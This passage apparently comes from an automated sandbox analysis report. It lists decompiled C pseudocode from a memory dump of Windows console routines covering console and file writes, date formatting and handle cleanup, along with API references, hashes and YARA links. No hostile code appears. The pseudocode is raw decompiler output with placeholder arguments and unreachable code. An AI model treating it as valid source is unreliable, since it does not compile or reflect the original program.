								goto L35;
							} else {
								goto L59;
							}
						}
					} else {
						_t184 = _t260 +  *(__ecx + 8) * 2;
						_v12 = _t184;
						if(_t260 < _t184) {
							_t238 = 0x2022;
							while(1) {
								_t259 = _t260;
								if(_t260 >= _t184) {
									goto L35;
								}
								while( *_t259 != _t238) {
									_t259 = _t259 + 2;
									if(_t259 < _t184) {
										continue;
									}
									break;
								}
								if(_t259 == _t260) {
									goto L48;
								} else {
									_t192 = _t259 - _t260 >> 1;
									_v16 = _t192;
									__imp___get_osfhandle(0);
									if(WriteConsoleW(_t192, 1, _t260, _t192,  &_v8) == 0) {
										L59:
										_t202 = 1;
										if(E011E0178(_t101) == 0) {
											_t202 = 1;
											_t103 = E011F9953(_t102, 1);
											if(_t103 == 0) {
												_push(_t103);
												_push(0x70);
												goto L63;
											}
										} else {
											_push(0);
											_push(0x1d);
											L63:
											E011DC5A2(_t202);
											_pop(_t202);
										}
										E011F9287(_t202);
										__imp__longjmp(0x120b8b8, 1);
										asm("int3");
										_t204 = 9;
										memcpy( &_v420, _t260, _t204 << 2);
										_t266 = _t266 + 0xc;
										E011F3C49( &_v420,  &_v376);
										FileTimeToLocalFileTime( &_v376,  &_v384);
										FileTimeToSystemTime( &_v384,  &_v348);
										_v352 = 0;
										if( *0x1213cc9 == 0) {
											_t245 = _v348 & 0x0000ffff;
											_t261 = _v346 & 0x0000ffff;
											_t258 = _v342 & 0x0000ffff;
											_v352 = _t245;
											if(_v364 == 0) {
												_t224 = 0x64;
												_t245 = _t245 % _t224;
												_v352 = _t245;
											}
											_t114 =  *0x11fd540; // 0x0
											if(_t114 != 2) {
												if(_t114 == 1) {
													_t135 = _t261;
													_t261 = _t258;
													_t258 = _t135;
												}
											} else {
												_t136 = _t245;
												_t245 = _t258;
												_t258 = _t261;
												_v352 = _t245;
												_t261 = _t136;
											}
											_t207 =  *0x11fd598; // 0x0
											if(_t207 >= 0x20) {
												_t115 =  *0x11fd594; // 0x0
												goto L92;
											} else {
												_t115 = realloc( *0x11fd594, 0x40);
												_pop(0);
												if(_t115 != 0) {
													_t245 = _v352;
													_t207 = 0x20;
													 *0x11fd594 = _t115;
													 *0x11fd598 = _t207;
													L92:
													_push(_t245);
													_push(0x11ff80c);
													_push(_t258);
													_push(0x11ff80c);
													E011E274C(_t115, _t207, L"%02d%s%02d%s%02d", _t261);
													_t266 = _t266 + 0x20;
													_t258 = 2;
													goto L34;
												} else {
													_push(_t115);
													goto L79;
												}
											}
										} else {
											_v356 = 0;
											if(GetLocaleInfoW(E011E41A4(), 0x1f,  &_v332, 0x80) == 0) {
												_t245 = 0x80;
												E011E1040( &_v332, 0x80,  *0x11ff7f8);
											}
											_t143 = _v332;
											_t263 =  &_v332;
											_t258 = 2;
											if(_t143 != 0) {
												_t195 = _v356;
												_t228 = _t143 & 0x0000ffff;
												_t161 = 0x64;
												do {
													if(_t228 == 0x27) {
														_t263 = _t263 + _t258;
														_t195 = 0 | _t195 == 0x00000000;
													} else {
														if(_t195 != 0 || _t228 != _t161 && _t228 != 0x4d) {
															_t263 = _t263 + _t258;
														} else {
															_t253 = 0;
															do {
																_t263 = _t263 + _t258;
																_t253 = 1 + _t253;
															} while ( *_t263 == _t228);
															_v356 = _t263;
															_t264 = _t263 +  ~_t253 * 2;
															if(_t253 != 1) {
																_t168 = 0x64;
																if(_t228 == _t168) {
																	_v360 = 0;
																}
																if(_t253 <= 3) {
																	_t263 = _v356;
																} else {
																	_t245 = _v356;
																	_t229 = _t245;
																	_v356 = _t229 + 2;
																	do {
																		_t170 =  *_t229;
																		_t229 = _t229 + _t258;
																	} while (_t170 != _v352);
																	_t263 = _t264 + 6;
																	memmove(_t263, _t245, 2 + (_t229 - _v356 >> 1) * 2);
																	_t266 = _t266 + 0xc;
																}
															} else {
																_t232 = _t264;
																_t245 = _t232 + 2;
																do {
																	_t174 =  *_t232;
																	_t232 = _t232 + _t258;
																} while (_t174 != _v352);
																memmove(_t264 + 2, _t264, 2 + (_t232 - _t245 >> 1) * 2);
																_t266 = _t266 + 0xc;
																_t263 = _t264 + 4;
															}
														}
													}
													_t164 =  *_t263 & 0x0000ffff;
													_t228 = _t164;
													_t161 = 0x64;
												} while (_t164 != 0);
												_t193 = _v368;
											}
											if(GetDateFormatW(E011E41A4(), 0,  &_v348,  &_v332,  *0x11fd594,  *0x11fd598) == 0) {
												L31:
												_t261 = GetDateFormatW(E011E41A4(), 0,  &_v348,  &_v332, 0, 0);
												if(_t261 == 0) {
													_t153 = GetLastError();
													_push(0);
													goto L77;
												} else {
													_t261 = _t261 + 1;
													_t155 = realloc( *0x11fd594, _t261 + _t261);
													_pop(0);
													if(_t155 == 0) {
														_push(0);
														L79:
														_push(8);
														goto L80;
													} else {
														 *0x11fd594 = _t155;
														 *0x11fd598 = _t261;
														_t261 = 0;
														if(GetDateFormatW(E011E41A4(), 0,  &_v348,  &_v332, _t155, 0) == 0) {
															_t153 = GetLastError();
															_push(0);
															L77:
															 *0x1213cf0 = _t153;
															_push(_t153);
															L80:
															E011DC5A2(0);
															_t122 = 0;
														} else {
															L34:
															_t261 =  *0x11fd594; // 0x0
															goto L14;
														}
													}
												}
											} else {
												_t261 =  *0x11fd594; // 0x0
												if(_t261 == 0) {
													goto L31;
												} else {
													L14:
													_push(E011D5AA7(_v344 & 0x0000ffff));
													_t245 = 0x20;
													E011E1040( &_v76, _t245);
													if(_t193 == 0) {
														if(_v360 != 0) {
															if(E011D68B5() == 0) {
																_push(_t261);
																_push( &_v76);
															} else {
																_push( &_v76);
																_push(_t261);
															}
															_t121 = E011E25D9(L"%s %s ");
														} else {
															_push(_t261);
															_t121 = E011E25D9(L"%s ");
														}
														_t193 = _t121;
													} else {
														if(_v360 == 0 || _v364 != 1) {
															E011E1040(_t193, _a8, _t261);
														} else {
															_t126 = E011D68B5();
															_t248 = _a8;
															_t216 = _t193;
															if(_t126 != 0) {
																E011E1040(_t216, _t248, _t261);
																E011E18C0(_t193, _a8, " ");
																_push( &_v76);
															} else {
																E011E1040(_t216, _t248,  &_v76);
																E011E18C0(_t193, _a8, " ");
																_push(_t261);
															}
															E011E18C0(_t193, _a8);
														}
														_t215 =  &(_t193[0]);
														_t245 = 0;
														do {
															_t125 =  *_t193;
															_t193 = _t193 + _t258;
														} while (_t125 != 0);
														_t193 = _t193 - _t215 >> 1;
													}
													_t122 = _t193;
												}
											}
										}
										return E011E6FD0(_t122, _t193, _v8 ^ _t265, _t245, _t258, _t261);
									} else {
										_t101 = _v16;
										if(_v8 != _v16) {
											goto L59;
										} else {
											_t184 = _v12;
											_t260 = _t259;
											_t238 = 0x2022;
											L48:
											while(_t259 < _t184) {
												if( *_t259 == _t238) {
													_t259 = _t259 + 2;
													continue;
												}
												break;
											}
											if(_t259 == _t260) {
												L55:
												_t238 = 0x2022;
												if(_t260 < _t184) {
													continue;
												} else {
													goto L35;
												}
											} else {
												if( *_t193 != 0) {
													SetConsoleMode( *_t193, 2);
												}
												_t187 = _t259 - _t260 >> 1;
												_v16 = _t187;
												__imp___get_osfhandle(_t260, _t187,  &_v8, 0);
												_t240 = 1;
												_t260 = WriteConsoleW(_t187, ??, ??, ??, ??);
												_t101 = E011E06C0(_t240);
												if(_t260 == 0) {
													goto L59;
												} else {
													_t101 = _v16;
													if(_v8 != _v16) {
														goto L59;
													} else {
														_t184 = _v12;
														_t260 = _t259;
														goto L55;
													}
												}
											}
										}
									}
								}
								goto L102;
							}
						}
						goto L35;
					}
				} else {
					L35:
					_t193[1] = _t193[1] + E011DBED7(_t193, _t193[4]);
					 *(_t193[4]) = 0;
					_t193[2] = _t193[2] & 0;
					return 0;
				}
				L102:
			}



































































                                                    0x011db6d4
                                                    0x011db6dc
                                                    0x011e9996
                                                    0x011e999b
                                                    0x011e99a0
                                                    0x011e9a97
                                                    0x00000000
                                                    0x011e9a99
                                                    0x011e9a99
                                                    0x011e9a9c
                                                    0x011e9aa1
                                                    0x00000000
                                                    0x00000000
                                                    0x00000000
                                                    0x00000000
                                                    0x011e9aa1
                                                    0x011e99a6
                                                    0x011e99a9
                                                    0x011e99ac
                                                    0x011e99b1
                                                    0x011e99b7
                                                    0x011e99bc
                                                    0x011e99bc
                                                    0x011e99c0
                                                    0x00000000
                                                    0x00000000
                                                    0x011e99c6
                                                    0x011e99cb
                                                    0x011e99d0
                                                    0x00000000
                                                    0x00000000
                                                    0x00000000
                                                    0x011e99d0
                                                    0x011e99d4
                                                    0x00000000
                                                    0x011e99d6
                                                    0x011e99e0
                                                    0x011e99e6
                                                    0x011e99e9
                                                    0x011e99f9
                                                    0x011e9aa7
                                                    0x011e9aa9
                                                    0x011e9ab1
                                                    0x011e9abb
                                                    0x011e9abc
                                                    0x011e9ac3
                                                    0x011e9ac5
                                                    0x011e9ac6
                                                    0x00000000
                                                    0x011e9ac6
                                                    0x011e9ab3
                                                    0x011e9ab3
                                                    0x011e9ab5
                                                    0x011e9ac8
                                                    0x011e9ac8
                                                    0x011e9ace
                                                    0x011e9ace
                                                    0x011e9acf
                                                    0x011e9adb
                                                    0x011e9ae1
                                                    0x011e9ae4
                                                    0x011e9aeb
                                                    0x011e9aeb
                                                    0x011e9af9
                                                    0x011d5b59
                                                    0x011d5b6d
                                                    0x011d5b75
                                                    0x011d5b81
                                                    0x011e9bba
                                                    0x011e9bc1
                                                    0x011e9bc8
                                                    0x011e9bcf
                                                    0x011e9bdb
                                                    0x011e9be3
                                                    0x011e9be4
                                                    0x011e9be6
                                                    0x011e9be6
                                                    0x011e9bec
                                                    0x011e9bf4
                                                    0x011e9c09
                                                    0x011e9c0b
                                                    0x011e9c0d
                                                    0x011e9c0f
                                                    0x011e9c0f
                                                    0x011e9bf6
                                                    0x011e9bf6
                                                    0x011e9bf8
                                                    0x011e9bfa
                                                    0x011e9bfc
                                                    0x011e9c02
                                                    0x011e9c02
                                                    0x011e9c11
                                                    0x011e9c1a
                                                    0x011e9c4c
                                                    0x00000000
                                                    0x011e9c1c
                                                    0x011e9c24
                                                    0x011e9c2b
                                                    0x011e9c2e
                                                    0x011e9c36
                                                    0x011e9c3e
                                                    0x011e9c3f
                                                    0x011e9c44
                                                    0x011e9c51
                                                    0x011e9c51
                                                    0x011e9c57
                                                    0x011e9c58
                                                    0x011e9c59
                                                    0x011e9c62
                                                    0x011e9c67
                                                    0x011e9c6c
                                                    0x00000000
                                                    0x011e9c30
                                                    0x011e9c30
                                                    0x00000000
                                                    0x011e9c30
                                                    0x011e9c2e
                                                    0x011d5b87
                                                    0x011d5b87
                                                    0x011d5baa
                                                    0x011e9b09
                                                    0x011e9b11
                                                    0x011e9b11
                                                    0x011d5bb0
                                                    0x011d5bb7
                                                    0x011d5bbf
                                                    0x011d5bc3
                                                    0x011d5bc5
                                                    0x011d5bcd
                                                    0x011d5bd0
                                                    0x011d5bd1
                                                    0x011d5bd5
                                                    0x011e9b1d
                                                    0x011e9b24
                                                    0x011d5bdb
                                                    0x011d5bdd
                                                    0x011d5bf2
                                                    0x011d5cdd
                                                    0x011d5cdf
                                                    0x011d5ce1
                                                    0x011d5ce1
                                                    0x011d5ce3
                                                    0x011d5ce4
                                                    0x011d5ceb
                                                    0x011d5cf3
                                                    0x011d5cf9
                                                    0x011e9b2d
                                                    0x011e9b31
                                                    0x011e9b35
                                                    0x011e9b35
                                                    0x011e9b3e
                                                    0x011e9b82
                                                    0x011e9b40
                                                    0x011e9b40
                                                    0x011e9b46
                                                    0x011e9b4b
                                                    0x011e9b51
                                                    0x011e9b51
                                                    0x011e9b54
                                                    0x011e9b56
                                                    0x011e9b65
                                                    0x011e9b74
                                                    0x011e9b7a
                                                    0x011e9b7a
                                                    0x011d5cff
                                                    0x011d5cff
                                                    0x011d5d01
                                                    0x011d5d04
                                                    0x011d5d04
                                                    0x011d5d07
                                                    0x011d5d09
                                                    0x011d5d23
                                                    0x011d5d29
                                                    0x011d5d2c
                                                    0x011d5d2c
                                                    0x011d5cf9
                                                    0x011d5bdd
                                                    0x011d5bf4
                                                    0x011d5bf9
                                                    0x011d5bfe
                                                    0x011d5bfe
                                                    0x011d5c01
                                                    0x011d5c01
                                                    0x011d5c32
                                                    0x011d5d34
                                                    0x011d5d53
                                                    0x011d5d57
                                                    0x011e9b8d
                                                    0x011e9b95
                                                    0x00000000
                                                    0x011d5d5d
                                                    0x011d5d5d
                                                    0x011d5d68
                                                    0x011d5d6f
                                                    0x011d5d72
                                                    0x011e9ba9
                                                    0x011e9baa
                                                    0x011e9baa
                                                    0x00000000
                                                    0x011d5d78
                                                    0x011d5d7a
                                                    0x011d5d8c
                                                    0x011d5d93
                                                    0x011d5da4
                                                    0x011e9b98
                                                    0x011e9b9e
                                                    0x011e9b9f
                                                    0x011e9b9f
                                                    0x011e9ba4
                                                    0x011e9bac
                                                    0x011e9bac
                                                    0x011e9bb3
                                                    0x011d5daa
                                                    0x011d5daa
                                                    0x011d5daa
                                                    0x00000000
                                                    0x011d5daa
                                                    0x011d5da4
                                                    0x011d5d72
                                                    0x011d5c38
                                                    0x011d5c38
                                                    0x011d5c40
                                                    0x00000000
                                                    0x011d5c46
                                                    0x011d5c46
                                                    0x011d5c52
                                                    0x011d5c55
                                                    0x011d5c59
                                                    0x011d5c60
                                                    0x011e9c79
                                                    0x011e9c94
                                                    0x011e9c9a
                                                    0x011e9c9b
                                                    0x011e9c96
                                                    0x011e9c96
                                                    0x011e9c97
                                                    0x011e9c97
                                                    0x011e9ca1
                                                    0x011e9c7b
                                                    0x011e9c7b
                                                    0x011e9c81
                                                    0x011e9c87
                                                    0x011e9ca9
                                                    0x011d5c66
                                                    0x011d5c6d
                                                    0x011e9cd4
                                                    0x011d5c80
                                                    0x011d5c80
                                                    0x011d5c85
                                                    0x011d5c88
                                                    0x011d5c8c
                                                    0x011e9cb1
                                                    0x011e9cc0
                                                    0x011e9cc8
                                                    0x011d5c92
                                                    0x011d5c96
                                                    0x011d5ca5
                                                    0x011d5caa
                                                    0x011d5caa
                                                    0x011d5cb0
                                                    0x011d5cb0
                                                    0x011d5cb5
                                                    0x011d5cb8
                                                    0x011d5cba
                                                    0x011d5cba
                                                    0x011d5cbd
                                                    0x011d5cbf
                                                    0x011d5cc6
                                                    0x011d5cc6
                                                    0x011d5cc8
                                                    0x011d5cc8
                                                    0x011d5c40
                                                    0x011d5c32
                                                    0x011d5cda
                                                    0x011e99ff
                                                    0x011e99ff
                                                    0x011e9a05
                                                    0x00000000
                                                    0x011e9a0b
                                                    0x011e9a0b
                                                    0x011e9a0e
                                                    0x011e9a10
                                                    0x00000000
                                                    0x011e9a1f
                                                    0x011e9a1a
                                                    0x011e9a1c
                                                    0x00000000
                                                    0x011e9a1c
                                                    0x00000000
                                                    0x011e9a1a
                                                    0x011e9a25
                                                    0x011e9a6f
                                                    0x011e9a6f
                                                    0x011e9a76
                                                    0x00000000
                                                    0x011e9a7c
                                                    0x00000000
                                                    0x011e9a7c
                                                    0x011e9a27
                                                    0x011e9a2a
                                                    0x011e9a30
                                                    0x011e9a30
                                                    0x011e9a40
                                                    0x011e9a46
                                                    0x011e9a49
                                                    0x011e9a4f
                                                    0x011e9a57
                                                    0x011e9a59
                                                    0x011e9a60
                                                    0x00000000
                                                    0x011e9a62
                                                    0x011e9a62
                                                    0x011e9a68
                                                    0x00000000
                                                    0x011e9a6a
                                                    0x011e9a6a
                                                    0x011e9a6d
                                                    0x00000000
                                                    0x011e9a6d
                                                    0x011e9a68
                                                    0x011e9a60
                                                    0x011e9a25
                                                    0x011e9a05
                                                    0x011e99f9
                                                    0x00000000
                                                    0x011e99d4
                                                    0x011e99bc
                                                    0x00000000
                                                    0x011e99b1
                                                    0x011db6e2
                                                    0x011db6e2
                                                    0x011db6ec
                                                    0x011db6f6
                                                    0x011db6f9
                                                    0x011db702
                                                    0x011db702
                                                    0x00000000

                                                    APIs
                                                    • _get_osfhandle.MSVCRT ref: 011E99E9
                                                    • WriteConsoleW.API-MS-WIN-CORE-CONSOLE-L1-1-0(00000000,?,?,?,?,?,?,?,?,00000000,?,00000001), ref: 011E99F1
                                                    • SetConsoleMode.API-MS-WIN-CORE-CONSOLE-L1-1-0(?,00000002,?,?,?,?,-00000001,-00000001,-00000001,-00000001), ref: 011E9A30
                                                    • _get_osfhandle.MSVCRT ref: 011E9A49
                                                    • WriteConsoleW.API-MS-WIN-CORE-CONSOLE-L1-1-0(00000000,?,?,?,?,?,?,?,?,00000000,?,00000001), ref: 011E9A51
                                                    Memory Dump Source
                                                    • Source File: 00000015.00000002.913116330.00000000011D0000.00000040.00000001.sdmp, Offset: 011D0000, based on PE: true
                                                    • Associated: 00000015.00000002.913190282.0000000001219000.00000040.00000001.sdmp Download File
                                                    • Associated: 00000015.00000002.913210919.000000000121D000.00000040.00000001.sdmp Download File
                                                    Similarity
                                                    • API ID: Console$Write_get_osfhandle$Mode
                                                    • String ID:
                                                    • API String ID: 1066134489-0
                                                    • Opcode ID: 5ff039ec64d9216b4eed72b3b2587159a5a2640a6f7a0d46ecb795624129ba88
                                                    • Instruction ID: b2367d8543b8867467642ad135a330f00be212c9dff3c6b42c8ea4a752b78ace
                                                    • Opcode Fuzzy Hash: 5ff039ec64d9216b4eed72b3b2587159a5a2640a6f7a0d46ecb795624129ba88
                                                    • Instruction Fuzzy Hash: 4741C431B006199BDF2CDEB8D85DBAE77E9EF90308F05446AE906DB181EB74D940CB50
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 011E2616, Relevance: 9.1, APIs: 6, Instructions: 90COMMON
                                                    Download Yara Rule
                                                    C-Code - Quality: 19%
                                                    			E011E2616(long __ecx, DWORD* __edx) {
				void _v8;
				void* _t4;
				long _t5;
				int _t21;
				long _t43;

				_push(__ecx);
				_t40 = __edx;
				_t43 = 0;
				if(__edx <= 0) {
					L5:
					_t5 = _t43;
					L6:
					return _t5;
				}
				if(E011E269C(_t4) != 0) {
					__imp__AcquireSRWLockShared(0x1217f20);
					_t7 =  &_v8;
					__imp___get_osfhandle(0);
					_t21 = WriteConsoleW( &_v8, 1, __ecx, __edx, _t7);
					if(_t21 == 0) {
						_t43 = GetLastError();
					}
					__imp__ReleaseSRWLockShared(0x1217f20);
				} else {
					_t40 = __edx + __edx;
					_t21 = E011E27C8( &_v8, __ecx, _t40,  &_v8);
				}
				if(_t21 == 0 || _v8 != _t40) {
					_t43 = GetLastError();
					if(_t43 == 0) {
						_t43 = 0x70;
					}
					if(E011E0178(_t10) == 0) {
						if(E011F9953(_t11, 1) == 0) {
							E011F985A(_t43);
						} else {
							_push(0);
							_push(0x2364);
							E011DC5A2(1);
						}
						_t5 = 1;
						goto L6;
					} else {
						_push(0);
						_push(0x1d);
						E011DC5A2(1);
						goto L5;
					}
				} else {
					goto L5;
				}
			}








                                                    0x011e261b
                                                    0x011e261f
                                                    0x011e2621
                                                    0x011e2627
                                                    0x011e2659
                                                    0x011e2659
                                                    0x011e265b
                                                    0x011e2661
                                                    0x011e2661
                                                    0x011e2633
                                                    0x011e2667
                                                    0x011e266f
                                                    0x011e2677
                                                    0x011e2685
                                                    0x011e2689
                                                    0x011ed681
                                                    0x011ed681
                                                    0x011e2694
                                                    0x011e2635
                                                    0x011e2638
                                                    0x011e2646
                                                    0x011e2646
                                                    0x011e264a
                                                    0x011ed68e
                                                    0x011ed692
                                                    0x011ed696
                                                    0x011ed696
                                                    0x011ed6a3
                                                    0x011ed6be
                                                    0x011ed6d2
                                                    0x011ed6c0
                                                    0x011ed6c0
                                                    0x011ed6c2
                                                    0x011ed6c7
                                                    0x011ed6cd
                                                    0x011ed6d7
                                                    0x00000000
                                                    0x011ed6a5
                                                    0x011ed6a5
                                                    0x011ed6a7
                                                    0x011ed6a9
                                                    0x00000000
                                                    0x011ed6af
                                                    0x00000000
                                                    0x00000000
                                                    0x00000000

                                                    APIs
                                                      • Part of subcall function 011E269C: _get_osfhandle.MSVCRT ref: 011E26A7
                                                      • Part of subcall function 011E269C: GetFileType.API-MS-WIN-CORE-FILE-L1-1-0(00000000,011DC5F8,?,?,?), ref: 011E26B6
                                                      • Part of subcall function 011E269C: GetStdHandle.API-MS-WIN-CORE-PROCESSENVIRONMENT-L1-1-0(000000F6,?,?,?,?,?,?,?,?,?,?,?,?,?,?,011DC5C6), ref: 011E26D2
                                                      • Part of subcall function 011E269C: AcquireSRWLockShared.API-MS-WIN-CORE-SYNCH-L1-1-0(01217F20,00000002), ref: 011E26E1
                                                      • Part of subcall function 011E269C: GetConsoleMode.API-MS-WIN-CORE-CONSOLE-L1-1-0(00000000,?), ref: 011E26EC
                                                      • Part of subcall function 011E269C: ReleaseSRWLockShared.API-MS-WIN-CORE-SYNCH-L1-1-0(01217F20,?,?,?,?,?,?,?,?,?,?,?,?,?,?,011DC5C6), ref: 011E26F5
                                                    • AcquireSRWLockShared.API-MS-WIN-CORE-SYNCH-L1-1-0(01217F20,00000000,?,?,0120B980,00000002,00000000,?,011E9CA6,%s %s ,?,00000000,00000000), ref: 011E2667
                                                    • _get_osfhandle.MSVCRT ref: 011E2677
                                                    • WriteConsoleW.API-MS-WIN-CORE-CONSOLE-L1-1-0(00000000,011E9CA6,%s %s ,?,00000000,00000000), ref: 011E267F
                                                    • ReleaseSRWLockShared.API-MS-WIN-CORE-SYNCH-L1-1-0(01217F20), ref: 011E2694
                                                      • Part of subcall function 011E27C8: _get_osfhandle.MSVCRT ref: 011E27DB
                                                      • Part of subcall function 011E27C8: WideCharToMultiByte.API-MS-WIN-CORE-STRING-L1-1-0(00000000,0120B980,000000FF,011FD620,00002000,00000000,00000000), ref: 011E281C
                                                      • Part of subcall function 011E27C8: WriteFile.API-MS-WIN-CORE-FILE-L1-1-0(?,011FD620,-00000001,?,00000000), ref: 011E2831
                                                    Memory Dump Source
                                                    • Source File: 00000015.00000002.913116330.00000000011D0000.00000040.00000001.sdmp, Offset: 011D0000, based on PE: true
                                                    • Associated: 00000015.00000002.913190282.0000000001219000.00000040.00000001.sdmp Download File
                                                    • Associated: 00000015.00000002.913210919.000000000121D000.00000040.00000001.sdmp Download File
                                                    Similarity
                                                    • API ID: LockShared$_get_osfhandle$AcquireConsoleFileReleaseWrite$ByteCharHandleModeMultiTypeWide
                                                    • String ID:
                                                    • API String ID: 4057327938-0
                                                    • Opcode ID: 748438cf8469d61f7657e911d6be472636f5ec2834d7814663d1cd859f12a45c
                                                    • Instruction ID: 82dd1b16d21cdff306abb0ec4e33d0a93c885e6816a1dd55a0f07e385e648846
                                                    • Opcode Fuzzy Hash: 748438cf8469d61f7657e911d6be472636f5ec2834d7814663d1cd859f12a45c
                                                    • Instruction Fuzzy Hash: BF210B32740B066BEF2C66E97C6DB6A36DCDBA8659F11053DFA0AD6180DF70CC004A61
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 011E27C8, Relevance: 9.1, APIs: 6, Instructions: 86fileCOMMON
                                                    Download Yara Rule
                                                    C-Code - Quality: 79%
                                                    			E011E27C8(void* __eax, void* __edx, long _a4, DWORD* _a8) {
				void* _v8;
				long _v12;
				long _v16;
				long _t15;
				void* _t17;
				void* _t24;
				DWORD* _t29;
				long _t31;
				long _t32;

				_t31 = _a4;
				_t23 = __edx;
				_v16 = _t31;
				__imp___get_osfhandle(_t24);
				_v8 = __eax;
				if( *0x121805c != 0) {
					return WriteFile(__eax, __edx, _t31, _a8, 0);
				}
				_t29 = _a8;
				while(_t31 > 0x2000) {
					_t15 = WideCharToMultiByte( *0x1203854, 0, _t23, 0x1000, 0x11fd620, 0x2000, 0, 0);
					_v12 = _t15;
					_t23 =  &(_t23[0x1000]);
					_t31 = _t31 - 0x2000;
					if(WriteFile(_v8, 0x11fd620, _t15, _t29, 0) == 0 ||  *_t29 != _v12) {
						L9:
						_t17 = 0;
						L7:
						return _t17;
					} else {
						continue;
					}
				}
				if(_t31 == 0) {
					L6:
					 *_t29 = _v16;
					_t17 = 1;
					goto L7;
				}
				_t5 = WideCharToMultiByte( *0x1203854, 0, _t23, 0xffffffff, 0x11fd620, 0x2000, 0, 0) - 1; // -1
				_t32 = _t5;
				if(WriteFile(_v8, 0x11fd620, _t32, _t29, 0) == 0 ||  *_t29 != _t32) {
					goto L9;
				} else {
					goto L6;
				}
			}












                                                    0x011e27d2
                                                    0x011e27d5
                                                    0x011e27d8
                                                    0x011e27db
                                                    0x011e27e9
                                                    0x011e27ec
                                                    0x00000000
                                                    0x011ed70d
                                                    0x011e27f3
                                                    0x011e27f6
                                                    0x011ed730
                                                    0x011ed747
                                                    0x011ed74a
                                                    0x011ed74c
                                                    0x011ed756
                                                    0x011e2850
                                                    0x011e2850
                                                    0x011e2847
                                                    0x00000000
                                                    0x011ed767
                                                    0x00000000
                                                    0x011ed767
                                                    0x011ed756
                                                    0x011e2805
                                                    0x011e283f
                                                    0x011e2842
                                                    0x011e2846
                                                    0x00000000
                                                    0x011e2846
                                                    0x011e2825
                                                    0x011e2825
                                                    0x011e2839
                                                    0x00000000
                                                    0x00000000
                                                    0x00000000
                                                    0x00000000

                                                    APIs
                                                    • _get_osfhandle.MSVCRT ref: 011E27DB
                                                    • WideCharToMultiByte.API-MS-WIN-CORE-STRING-L1-1-0(00000000,0120B980,000000FF,011FD620,00002000,00000000,00000000), ref: 011E281C
                                                    • WriteFile.API-MS-WIN-CORE-FILE-L1-1-0(?,011FD620,-00000001,?,00000000), ref: 011E2831
                                                    • WriteFile.API-MS-WIN-CORE-FILE-L1-1-0(00000000,0120B980,?,?,00000000), ref: 011ED70D
                                                    • WideCharToMultiByte.API-MS-WIN-CORE-STRING-L1-1-0(00000000,0120B980,00001000,011FD620,00002000,00000000,00000000,00000000), ref: 011ED730
                                                    • WriteFile.API-MS-WIN-CORE-FILE-L1-1-0(?,011FD620,00000000,?,00000000), ref: 011ED74E
                                                    Memory Dump Source
                                                    • Source File: 00000015.00000002.913116330.00000000011D0000.00000040.00000001.sdmp, Offset: 011D0000, based on PE: true
                                                    • Associated: 00000015.00000002.913190282.0000000001219000.00000040.00000001.sdmp Download File
                                                    • Associated: 00000015.00000002.913210919.000000000121D000.00000040.00000001.sdmp Download File
                                                    Similarity
                                                    • API ID: FileWrite$ByteCharMultiWide$_get_osfhandle
                                                    • String ID:
                                                    • API String ID: 3249344982-0
                                                    • Opcode ID: 2b8ebd5a962cbe2294487688cc4a196402efabeff171a66c39aa2ed5b3fb2c56
                                                    • Instruction ID: 4936cec639dff8ee6a99c22ccfc33561d2be85aaf3cdb5d6b5a3f60f827fc540
                                                    • Opcode Fuzzy Hash: 2b8ebd5a962cbe2294487688cc4a196402efabeff171a66c39aa2ed5b3fb2c56
                                                    • Instruction Fuzzy Hash: 8421B331A84608BBEF358EA5AC0DF6A7BFDEB14751F204169FA04A7184D7B05D40DB94
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 011F265F, Relevance: 9.1, APIs: 6, Instructions: 82memorysynchronizationCOMMON
                                                    Download Yara Rule
                                                    C-Code - Quality: 91%
                                                    			E011F265F(int* __ecx) {
				void** _v0;
				void* _v8;
				int _t18;
				void** _t29;
				void** _t32;
				void* _t39;
				void* _t42;

				_push(__ecx);
				_t39 = __ecx;
				_t29 =  &(__ecx[1]);
				_t32 = _t29;
				E011F2D6D(_t32,  &_v8);
				_t18 =  *__ecx - 1;
				 *__ecx = _t18;
				if(_t18 != 0) {
					_t42 = _v8;
					goto L18;
				} else {
					_t33 = __ecx[2];
					if(__ecx[2] != 0) {
						E011F2DB4(_t33);
					}
					_t42 = 0;
					 *(_t39 + 8) = 0;
					_t34 =  *(_t39 + 0xc);
					if( *(_t39 + 0xc) != 0) {
						E011F2DB4(_t34);
					}
					_t35 = _v8;
					 *(_t39 + 0xc) = _t42;
					if(_v8 != 0) {
						E011F2DE9(_t35);
					}
					_t18 = E011F25D6(_t35);
					if(_t18 == 0) {
						_t32 = _t39 + 0x18;
						E011F170A(_t32);
						if( *(_t39 + 0xc) != _t42 && CloseHandle( *(_t39 + 0xc)) == 0) {
							L10:
							_push(_t32);
							L11:
							_t32 = _v0;
							E011F2D56();
						}
						if( *(_t39 + 8) != _t42 && CloseHandle( *(_t39 + 8)) == 0) {
							goto L10;
						}
						if( *_t29 != _t42 && CloseHandle( *_t29) == 0) {
							goto L10;
						}
						_t18 = RtlFreeHeap(GetProcessHeap(), _t42, _t39);
						L18:
						if(_t42 != 0) {
							_t18 = ReleaseMutex(_t42);
							if(_t18 == 0) {
								_push(_t32);
								goto L11;
							}
						}
					}
				}
				return _t18;
			}










                                                    0x011f2664
                                                    0x011f2668
                                                    0x011f2670
                                                    0x011f2674
                                                    0x011f2676
                                                    0x011f267d
                                                    0x011f2680
                                                    0x011f2682
                                                    0x011f2718
                                                    0x00000000
                                                    0x011f2688
                                                    0x011f2688
                                                    0x011f268d
                                                    0x011f268f
                                                    0x011f268f
                                                    0x011f2694
                                                    0x011f2696
                                                    0x011f2699
                                                    0x011f269e
                                                    0x011f26a0
                                                    0x011f26a0
                                                    0x011f26a5
                                                    0x011f26a8
                                                    0x011f26ad
                                                    0x011f26af
                                                    0x011f26af
                                                    0x011f26b4
                                                    0x011f26bb
                                                    0x011f26bd
                                                    0x011f26c0
                                                    0x011f26c8
                                                    0x011f26d7
                                                    0x011f26d7
                                                    0x011f26dd
                                                    0x011f26dd
                                                    0x011f26e0
                                                    0x011f26e0
                                                    0x011f26e8
                                                    0x00000000
                                                    0x00000000
                                                    0x011f26f9
                                                    0x00000000
                                                    0x00000000
                                                    0x011f2710
                                                    0x011f271b
                                                    0x011f271d
                                                    0x011f2720
                                                    0x011f2728
                                                    0x011f272a
                                                    0x00000000
                                                    0x011f272b
                                                    0x011f2728
                                                    0x011f271d
                                                    0x011f26bb
                                                    0x011f2738

                                                    APIs
